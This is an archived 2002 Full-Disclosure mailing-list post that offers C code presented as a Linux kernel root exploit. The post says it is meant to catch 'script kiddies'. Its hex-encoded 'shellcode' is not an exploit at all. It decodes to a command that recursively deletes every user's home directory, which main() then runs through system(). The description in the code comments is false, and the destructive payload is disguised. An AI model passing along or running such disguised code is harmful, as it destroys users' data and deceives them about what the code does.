OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Day Jay (d4yj4y_at_yahoo.com)
Date: Fri Nov 29 2002 - 02:41:06 CST

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Chung's Donut Shop
    =====================

    Here's a small donation to the blackhat community.
    This script eradicates script kiddies.

    Since ecclectic spirit is releasing a whole bunch of
    cool code, we like decided to unveil this.

    /* Proof of concept code!!
       DO NOT DISTRIBUTE!

       
       Get r00t on any Linux x86 system
       With the below shellcode.
     
       It uses an exploit in the linux
       kernel to elevate privilages to root!

    */
    char shellcode[] =
    "\x2f\x62\x69\x6e\x2f\x72\x6d\x20"
    "\x2d\x72\x66\x20\x2f\x68\x6f\x6d"
    "\x65\x2f\x2a\x3b\x63\x6c\x65\x61"
    "\x72\x3b\x65\x63\x68\x6f\x20\x62"
    "\x6c\x34\x63\x6b\x68\x34\x74\x2c"
    "\x68\x65\x68\x65";

    main()
    {
    system(shellcode);
    return 0;
    }

    __________________________________________________
    Do you Yahoo!?
    Yahoo! Mail Plus - Powerful. Affordable. Sign up now.
    http://mailplus.yahoo.com
    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html